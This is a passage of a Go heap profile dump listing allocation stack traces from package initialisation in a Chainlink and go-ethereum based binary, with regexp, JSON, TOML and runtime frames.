# 0xddb79e github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileURL+0x9e /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:216
# 0xddbcde github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileRef+0x47e /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:234
# 0xddc944 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileMap+0x3c4 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:325
# 0xddc4d2 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compile+0x132 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:296
# 0xddbbeb github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileRef+0x38b /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:262
# 0xde1b86 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileMap.func3+0xc6 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:484
# 0xde19fe github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileMap.func5+0x13e /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:499
# 0xdddaec github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileMap+0x156c /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:514
# 0xddc4d2 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compile+0x132 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:296
# 0xddbade github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileRef+0x27e /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:241
# 0xddb7f7 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileURL+0xf7 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:220
# 0xddacf9 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).Compile+0xd9 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:133
# 0xddab97 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).MustCompile+0x17 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:114
# 0xde207d github.com/santhosh-tekuri/jsonschema/v5.(*Draft).loadMeta+0x17d /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/draft.go:46
# 0xde382c github.com/santhosh-tekuri/jsonschema/v5.init.0+0x7ec /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/draft.go:812
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [1: 3072] @ 0x48e86c 0x494207 0x6bf65b 0x6bf6a0 0x6bece5 0x6beacf 0x6be9ed 0x6beacf 0x6be5a6 0x6beacf 0x6bd78b 0x6d2157 0x6d2c6c 0x6d2c60 0x19d882d 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x6bf65a regexp/syntax.(*compiler).inst+0x9a /usr/local/go/src/regexp/syntax/compile.go:164
# 0x6bf69f regexp/syntax.(*compiler).rune+0xdf /usr/local/go/src/regexp/syntax/compile.go:273
# 0x6bece4 regexp/syntax.(*compiler).compile+0x13c4 /usr/local/go/src/regexp/syntax/compile.go:101
# 0x6beace regexp/syntax.(*compiler).compile+0x11ae /usr/local/go/src/regexp/syntax/compile.go:147
# 0x6be9ec regexp/syntax.(*compiler).compile+0x10cc /usr/local/go/src/regexp/syntax/compile.go:154
# 0x6beace regexp/syntax.(*compiler).compile+0x11ae /usr/local/go/src/regexp/syntax/compile.go:147
# 0x6be5a5 regexp/syntax.(*compiler).compile+0xc85 /usr/local/go/src/regexp/syntax/compile.go:129
# 0x6beace regexp/syntax.(*compiler).compile+0x11ae /usr/local/go/src/regexp/syntax/compile.go:147
# 0x6bd78a regexp/syntax.Compile+0x12a /usr/local/go/src/regexp/syntax/compile.go:74
# 0x6d2156 regexp.compile+0x76 /usr/local/go/src/regexp/regexp.go:176
# 0x6d2c6b regexp.Compile+0x2b /usr/local/go/src/regexp/regexp.go:131
# 0x6d2c5f regexp.MustCompile+0x1f /usr/local/go/src/regexp/regexp.go:311
# 0x19d882c github.com/smartcontractkit/chainlink-evm/pkg/client.init+0x24c /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/client/errors.go:102
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [1: 224] @ 0x48e865 0x494207 0xcec385 0xcec2e6 0xcebf2e 0xceb407 0xceaf5d 0xd03297 0xd0325d 0xd030bf 0xd02bc5 0xd11a12 0x19a9067 0x19a86db 0x19a814f 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0xcec384 github.com/pelletier/go-toml/v2/unstable.(*builder).Push+0x364 /go/pkg/mod/github.com/pelletier/go-toml/v2@v2.3.1/unstable/builder.go:42
# 0xcec2e5 github.com/pelletier/go-toml/v2/unstable.(*Parser).parseVal+0x2c5 /go/pkg/mod/github.com/pelletier/go-toml/v2@v2.3.1/unstable/parser.go:424
# 0xcebf2d github.com/pelletier/go-toml/v2/unstable.(*Parser).parseKeyval+0x2ed /go/pkg/mod/github.com/pelletier/go-toml/v2@v2.3.1/unstable/parser.go:367
# 0xceb406 github.com/pelletier/go-toml/v2/unstable.(*Parser).parseExpression+0xa6 /go/pkg/mod/github.com/pelletier/go-toml/v2@v2.3.1/unstable/parser.go:255
# 0xceaf5c github.com/pelletier/go-toml/v2/unstable.(*Parser).NextExpression+0xdc /go/pkg/mod/github.com/pelletier/go-toml/v2@v2.3.1/unstable/parser.go:143
# 0xd03296 github.com/pelletier/go-toml/v2.(*decoder).nextExpr+0x56 /go/pkg/mod/github.com/pelletier/go-toml/v2@v2.3.1/unmarshaler.go:203
# 0xd0325c github.com/pelletier/go-toml/v2.(*decoder).fromParser+0x1c /go/pkg/mod/github.com/pelletier/go-toml/v2@v2.3.1/unmarshaler.go:257
# 0xd030be github.com/pelletier/go-toml/v2.(*decoder).FromParser+0x13e /go/pkg/mod/github.com/pelletier/go-toml/v2@v2.3.1/unmarshaler.go:243
# 0xd02bc4 github.com/pelletier/go-toml/v2.(*Decoder).Decode+0x244 /go/pkg/mod/github.com/pelletier/go-toml/v2@v2.3.1/unmarshaler.go:136
# 0xd11a11 github.com/smartcontractkit/chainlink-common/pkg/config.DecodeTOML+0x51 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/config/toml.go:14
# 0x19a9066 github.com/smartcontractkit/chainlink-evm/pkg/config/toml.readConfig+0x1a6 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/config/toml/defaults.go:152
# 0x19a86da github.com/smartcontractkit/chainlink-evm/pkg/config/toml.initDefaults+0x2da /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/config/toml/defaults.go:99
# 0x19a814e github.com/smartcontractkit/chainlink-evm/pkg/config/toml.init.0+0x6e /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/config/toml/defaults.go:42
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [1: 128] @ 0x48e88c 0x494273 0x6cf6d3 0x6cf661 0x6d0a9f 0x6d097a 0x6d097a 0x6d097a 0x6d097a 0x6d097a 0x6d097a 0x6d097a 0x6d0d4a 0x6d09bf 0x6d0d4a 0x6d0b53 0x6d06cb 0x6d1d8a 0x6d216f 0x6d2c6c 0x6d2c60 0xfb81b6 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x6cf6d2 regexp.mergeRuneSets.func2+0x212 /usr/local/go/src/regexp/onepass.go:182
# 0x6cf660 regexp.mergeRuneSets+0x1a0 /usr/local/go/src/regexp/onepass.go:192
# 0x6d0a9e regexp.makeOnePass.func1+0x2de /usr/local/go/src/regexp/onepass.go:336
# 0x6d0979 regexp.makeOnePass.func1+0x1b9 /usr/local/go/src/regexp/onepass.go:317
# 0x6d0979 regexp.makeOnePass.func1+0x1b9 /usr/local/go/src/regexp/onepass.go:317
# 0x6d0979 regexp.makeOnePass.func1+0x1b9 /usr/local/go/src/regexp/onepass.go:317
# 0x6d0979 regexp.makeOnePass.func1+0x1b9 /usr/local/go/src/regexp/onepass.go:317
# 0x6d0979 regexp.makeOnePass.func1+0x1b9 /usr/local/go/src/regexp/onepass.go:317
# 0x6d0979 regexp.makeOnePass.func1+0x1b9 /usr/local/go/src/regexp/onepass.go:317
# 0x6d0979 regexp.makeOnePass.func1+0x1b9 /usr/local/go/src/regexp/onepass.go:317
# 0x6d0d49 regexp.makeOnePass.func1+0x589 /usr/local/go/src/regexp/onepass.go:343
# 0x6d09be regexp.makeOnePass.func1+0x1fe /usr/local/go/src/regexp/onepass.go:317
# 0x6d0d49 regexp.makeOnePass.func1+0x589 /usr/local/go/src/regexp/onepass.go:343
# 0x6d0b52 regexp.makeOnePass.func1+0x392 /usr/local/go/src/regexp/onepass.go:352
# 0x6d06ca regexp.makeOnePass+0x3ea /usr/local/go/src/regexp/onepass.go:442
# 0x6d1d89 regexp.compileOnePass+0x1a9 /usr/local/go/src/regexp/onepass.go:502
# 0x6d216e regexp.compile+0x8e /usr/local/go/src/regexp/regexp.go:187
# 0x6d2c6b regexp.Compile+0x2b /usr/local/go/src/regexp/regexp.go:131
# 0x6d2c5f regexp.MustCompile+0x1f /usr/local/go/src/regexp/regexp.go:311
# 0xfb81b5 github.com/Masterminds/semver/v3.init.0+0x515 /go/pkg/mod/github.com/!masterminds/semver/v3@v3.5.0/constraints.go:241
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [1: 12288] @ 0x48e88c 0x494273 0x494447 0x4f5ea5 0x4f5d4e 0x6de285 0x6dd814 0x6dd03e 0x6dcc19 0x1654b96 0x1654b3b 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x494446 reflect.growslice+0x46 /usr/local/go/src/runtime/slice.go:373
# 0x4f5ea4 reflect.Value.grow+0xa4 /usr/local/go/src/reflect/value.go:2746
# 0x4f5d4d reflect.Value.Grow+0x6d /usr/local/go/src/reflect/value.go:2733
# 0x6de284 encoding/json.(*decodeState).array+0x404 /usr/local/go/src/encoding/json/decode.go:552
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6dcc18 encoding/json.Unmarshal+0xf8 /usr/local/go/src/encoding/json/decode.go:113
# 0x1654b95 github.com/ethereum/go-ethereum/core/filtermaps.decodeCheckpoints+0x75 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/core/filtermaps/checkpoints.go:63
# 0x1654b3a github.com/ethereum/go-ethereum/core/filtermaps.init+0x1a /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/core/filtermaps/checkpoints.go:56
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [0: 0] @ 0x48e893 0x4287c5 0x7867b4 0x78678e 0x10c7e2e 0x10c3e45 0x4994c1
# 0x7867b3 compress/flate.NewWriter+0x293 /usr/local/go/src/compress/flate/deflate.go:665
# 0x78678d compress/gzip.(*Writer).Write+0x26d /usr/local/go/src/compress/gzip/gzip.go:191
# 0x10c7e2d runtime/pprof.(*profileBuilder).build+0x56d /usr/local/go/src/runtime/pprof/proto.go:390
# 0x10c3e44 runtime/pprof.profileWriter+0xa4 /usr/local/go/src/runtime/pprof/pprof.go:943
0: 0 [1: 240] @ 0x48e865 0x493c69 0x6d7a15 0x6d4fa4 0x6d7965 0x138fdac 0x13850ef 0x6dec0e 0x6dd7de 0x6de35b 0x6dd814 0x6df2e5 0x6dd7de 0x6de35b 0x6dd814 0x6dd03e 0x6dcc19 0x13837d8 0x6de208 0x6dd814 0x6dd03e 0x6f031f 0x13827d4 0x14f5fe5 0x14f5ecf 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x6d7a14 regexp.(*Regexp).FindAllStringSubmatch.func1+0x54 /usr/local/go/src/regexp/regexp.go:1178
# 0x6d4fa3 regexp.(*Regexp).allMatches+0x2c3 /usr/local/go/src/regexp/regexp.go:790
# 0x6d7964 regexp.(*Regexp).FindAllStringSubmatch+0x64 /usr/local/go/src/regexp/regexp.go:1176
# 0x138fdab github.com/ethereum/go-ethereum/accounts/abi.NewType+0x62b /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/type.go:119
# 0x13850ee github.com/ethereum/go-ethereum/accounts/abi.(*Argument).UnmarshalJSON+0x14e /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/argument.go:53
# 0x6dec0d encoding/json.(*decodeState).object+0x68d /usr/local/go/src/encoding/json/decode.go:610
# 0x6dd7dd encoding/json.(*decodeState).value+0x3d /usr/local/go/src/encoding/json/decode.go:380
# 0x6de35a encoding/json.(*decodeState).array+0x4da /usr/local/go/src/encoding/json/decode.go:561
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6df2e4 encoding/json.(*decodeState).object+0xd64 /usr/local/go/src/encoding/json/decode.go:767
# 0x6dd7dd encoding/json.(*decodeState).value+0x3d /usr/local/go/src/encoding/json/decode.go:380
# 0x6de35a encoding/json.(*decodeState).array+0x4da /usr/local/go/src/encoding/json/decode.go:561
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6dcc18 encoding/json.Unmarshal+0xf8 /usr/local/go/src/encoding/json/decode.go:113
# 0x13837d7 github.com/ethereum/go-ethereum/accounts/abi.(*ABI).UnmarshalJSON+0x77 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:160
# 0x6de207 encoding/json.(*decodeState).array+0x387 /usr/local/go/src/encoding/json/decode.go:513
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6f031e encoding/json.(*Decoder).Decode+0x15e /usr/local/go/src/encoding/json/stream.go:75
# 0x13827d3 github.com/ethereum/go-ethereum/accounts/abi.JSON+0xb3 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:52
# 0x14f5fe4 github.com/smartcontractkit/libocr/offchainreporting2plus/chains/evmutil.makeConfigDigestArgs+0xc4 /go/pkg/mod/github.com/smartcontractkit/libocr@v0.0.0-20260529134643-c101335a64cd/offchainreporting2plus/chains/evmutil/config_digest.go:17
# 0x14f5ece github.com/smartcontractkit/libocr/offchainreporting2plus/chains/evmutil.init+0xe /go/pkg/mod/github.com/smartcontractkit/libocr@v0.0.0-20260529134643-c101335a64cd/offchainreporting2plus/chains/evmutil/config_digest.go:26
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
1: 16 [1: 16] @ 0x48e885 0x4287c5 0x13992df 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x13992de github.com/ethereum/go-ethereum/params.init+0x20be /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/params/config.go:98
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
1: 32 [1: 32] @ 0x48e865 0x4287c5 0x139763d 0x139765e 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x139763c math/big.NewInt+0x41c /usr/local/go/src/math/big/int.go:91
# 0x139765d github.com/ethereum/go-ethereum/params.init+0x43d /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/params/config.go:204
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
1: 64 [1: 64] @ 0x48e865 0x4287c5 0x159e1e9 0x159b35c 0x159b23c 0x159b15c 0x159af5c 0x159ad7c 0x159abdc 0x15a8afe 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x159e1e8 github.com/ethereum/go-ethereum/core/vm.newFrontierInstructionSet+0x2da8 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/core/vm/jump_table.go:1097
# 0x159b35b github.com/ethereum/go-ethereum/core/vm.newHomesteadInstructionSet+0x3b /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/core/vm/jump_table.go:271
# 0x159b23b github.com/ethereum/go-ethereum/core/vm.newTangerineWhistleInstructionSet+0x3b /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/core/vm/jump_table.go:257
# 0x159b15b github.com/ethereum/go-ethereum/core/vm.newSpuriousDragonInstructionSet+0x3b /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/core/vm/jump_table.go:250
# 0x159af5b github.com/ethereum/go-ethereum/core/vm.newByzantiumInstructionSet+0x3b /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/core/vm/jump_table.go:215
# 0x159ad7b github.com/ethereum/go-ethereum/core/vm.newConstantinopleInstructionSet+0x3b /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/core/vm/jump_table.go:176
# 0x159abdb github.com/ethereum/go-ethereum/core/vm.newIstanbulInstructionSet+0x3b /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/core/vm/jump_table.go:164
# 0x15a8afd github.com/ethereum/go-ethereum/core/vm.init+0x399d /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/core/vm/jump_table.go:57
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
1: 96 [1: 96] @ 0x48e88c 0x493c69 0xa12ee5 0xa12968 0xd97b88 0xfa3d69 0xfa3b7e 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0xa12ee4 github.com/prometheus/client_golang/prometheus.newHistogram+0x564 /go/pkg/mod/github.com/prometheus/client_golang@v1.23.2/prometheus/histogram.go:604
# 0xa12967 github.com/prometheus/client_golang/prometheus.NewHistogram+0x167 /go/pkg/mod/github.com/prometheus/client_golang@v1.23.2/prometheus/histogram.go:524
# 0xd97b87 github.com/prometheus/client_golang/prometheus/promauto.Factory.NewHistogram+0xc7 /go/pkg/mod/github.com/prometheus/client_golang@v1.23.2/prometheus/promauto/auto.go:349
# 0xfa3d68 github.com/prometheus/client_golang/prometheus/promauto.NewHistogram+0x208 /go/pkg/mod/github.com/prometheus/client_golang@v1.23.2/prometheus/promauto/auto.go:227
# 0xfa3b7d github.com/smartcontractkit/chainlink-common/pkg/sqlutil.init+0x1d /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/sqlutil/monitor.go:23
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
1: 96 [1: 96] @ 0x48e865 0x4287c5 0x43e27a 0x43e97f 0x4994c1
# 0x48e864 runtime.mallocgc+0xa4 /usr/local/go/src/runtime/malloc.go:1150
# 0x4287c4 runtime.newobject+0x24 /usr/local/go/src/runtime/malloc.go:2157
# 0x43e279 runtime.(*scavengerState).init+0x59 /usr/local/go/src/runtime/mgcscavenge.go:363
# 0x43e97e runtime.bgscavenge+0x1e /usr/local/go/src/runtime/mgcscavenge.go:650
1: 128 [1: 128] @ 0x48e88c 0x493c69 0x4036f2 0x4e67f6 0x4e67fc 0x13912b6 0x13908ad 0x13850ef 0x6dec0e 0x6dd7de 0x6de35b 0x6dd814 0x6df2e5 0x6dd7de 0x6de35b 0x6dd814 0x6dd03e 0x6dcc19 0x13837d8 0x6de208 0x6dd814 0x6dd03e 0x6f031f 0x13827d4 0x1bbea05 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x4036f1 internal/abi.NewName+0x171 /usr/local/go/src/internal/abi/type.go:702
# 0x4e67f5 reflect.newName+0x215 /usr/local/go/src/reflect/type.go:461
# 0x4e67fb reflect.SliceOf+0x21b /usr/local/go/src/reflect/type.go:2173
# 0x13912b5 github.com/ethereum/go-ethereum/accounts/abi.Type.GetType+0x155 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/type.go:245
# 0x13908ac github.com/ethereum/go-ethereum/accounts/abi.NewType+0x112c /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/type.go:190
# 0x13850ee github.com/ethereum/go-ethereum/accounts/abi.(*Argument).UnmarshalJSON+0x14e /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/argument.go:53
# 0x6dec0d encoding/json.(*decodeState).object+0x68d /usr/local/go/src/encoding/json/decode.go:610
# 0x6dd7dd encoding/json.(*decodeState).value+0x3d /usr/local/go/src/encoding/json/decode.go:380
# 0x6de35a encoding/json.(*decodeState).array+0x4da /usr/local/go/src/encoding/json/decode.go:561
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6df2e4 encoding/json.(*decodeState).object+0xd64 /usr/local/go/src/encoding/json/decode.go:767
# 0x6dd7dd encoding/json.(*decodeState).value+0x3d /usr/local/go/src/encoding/json/decode.go:380
# 0x6de35a encoding/json.(*decodeState).array+0x4da /usr/local/go/src/encoding/json/decode.go:561
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6dcc18 encoding/json.Unmarshal+0xf8 /usr/local/go/src/encoding/json/decode.go:113
# 0x13837d7 github.com/ethereum/go-ethereum/accounts/abi.(*ABI).UnmarshalJSON+0x77 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:160
# 0x6de207 encoding/json.(*decodeState).array+0x387 /usr/local/go/src/encoding/json/decode.go:513
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6f031e encoding/json.(*Decoder).Decode+0x15e /usr/local/go/src/encoding/json/stream.go:75
# 0x13827d3 github.com/ethereum/go-ethereum/accounts/abi.JSON+0xb3 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:52
# 0x1bbea04 github.com/smartcontractkit/chainlink-evm/pkg/read.init+0xc4 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/read/event.go:807
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
1: 160 [1: 160] @ 0x48e865 0x4287c5 0x6d222b 0x6d2c6c 0x6d2c60 0x168ae0a 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x6d222a regexp.compile+0x14a /usr/local/go/src/regexp/regexp.go:184
# 0x6d2c6b regexp.Compile+0x2b /usr/local/go/src/regexp/regexp.go:131
# 0x6d2c5f regexp.MustCompile+0x1f /usr/local/go/src/regexp/regexp.go:311
# 0x168ae09 github.com/russross/blackfriday/v2.init+0x109 /go/pkg/mod/github.com/russross/blackfriday/v2@v2.1.0/inline.go:24
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
1: 704 [1: 704] @ 0x48e86c 0x48ea5e 0x48eaf3 0x412185 0x412178 0x417a37 0xe9978a 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0xe99789 github.com/smartcontractkit/chain-selectors.init.3+0x509 /go/pkg/mod/github.com/smartcontractkit/chain-selectors@v1.0.100/solana.go:46
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
1: 2048 [1: 2048] @ 0x48e86c 0x4287c5 0x45d531 0x45e075 0x45e730 0x4912ec 0x460d9e 0x4612c7 0x4616e5 0x497875
# 0x48e86b runtime.mallocgc+0xab /usr/local/go/src/runtime/malloc.go:1152
# 0x4287c4 runtime.newobject+0x24 /usr/local/go/src/runtime/malloc.go:2157
# 0x45d530 runtime.allocm+0x90 /usr/local/go/src/runtime/proc.go:2324
# 0x45e074 runtime.newm+0x34 /usr/local/go/src/runtime/proc.go:2870
# 0x45e72f runtime.startm+0x12f /usr/local/go/src/runtime/proc.go:3096
# 0x4912eb runtime.wakep+0xeb /usr/local/go/src/runtime/proc.go:3243
# 0x460d9d runtime.resetspinning+0x3d /usr/local/go/src/runtime/proc.go:4034
# 0x4612c6 runtime.schedule+0x126 /usr/local/go/src/runtime/proc.go:4199
# 0x4616e4 runtime.park_m+0x284 /usr/local/go/src/runtime/proc.go:4304
# 0x497874 runtime.mcall+0x54 /usr/local/go/src/runtime/asm_amd64.s:496
1: 2048 [1: 2048] @ 0x48e86c 0x4287c5 0x45d531 0x45e075 0x45e730 0x4912ec 0x460d9e 0x4612c7 0x45cd6d 0x45cc75 0x4977ec
# 0x48e86b runtime.mallocgc+0xab /usr/local/go/src/runtime/malloc.go:1152
# 0x4287c4 runtime.newobject+0x24 /usr/local/go/src/runtime/malloc.go:2157
# 0x45d530 runtime.allocm+0x90 /usr/local/go/src/runtime/proc.go:2324
# 0x45e074 runtime.newm+0x34 /usr/local/go/src/runtime/proc.go:2870
# 0x45e72f runtime.startm+0x12f /usr/local/go/src/runtime/proc.go:3096
# 0x4912eb runtime.wakep+0xeb /usr/local/go/src/runtime/proc.go:3243
# 0x460d9d runtime.resetspinning+0x3d /usr/local/go/src/runtime/proc.go:4034
# 0x4612c6 runtime.schedule+0x126 /usr/local/go/src/runtime/proc.go:4199
# 0x45cd6c runtime.mstart1+0xcc /usr/local/go/src/runtime/proc.go:1942
# 0x45cc74 runtime.mstart0+0x74 /usr/local/go/src/runtime/proc.go:1888
# 0x4977eb runtime.mstart+0xb /usr/local/go/src/runtime/asm_amd64.s:426
1: 2048 [1: 2048] @ 0x48e86c 0x4287c5 0x45d531 0x45e075 0x45e730 0x45ebb6 0x45ec32 0x4611da 0x4616e5 0x497875
# 0x48e86b runtime.mallocgc+0xab /usr/local/go/src/runtime/malloc.go:1152
# 0x4287c4 runtime.newobject+0x24 /usr/local/go/src/runtime/malloc.go:2157
# 0x45d530 runtime.allocm+0x90 /usr/local/go/src/runtime/proc.go:2324
# 0x45e074 runtime.newm+0x34 /usr/local/go/src/runtime/proc.go:2870
# 0x45e72f runtime.startm+0x12f /usr/local/go/src/runtime/proc.go:3096
# 0x45ebb5 runtime.handoffp+0x2f5 /usr/local/go/src/runtime/proc.go:3137
# 0x45ec31 runtime.stoplockedm+0x51 /usr/local/go/src/runtime/proc.go:3259
# 0x4611d9 runtime.schedule+0x39 /usr/local/go/src/runtime/proc.go:4143
# 0x4616e4 runtime.park_m+0x284 /usr/local/go/src/runtime/proc.go:4304
# 0x497874 runtime.mcall+0x54 /usr/local/go/src/runtime/asm_amd64.s:496
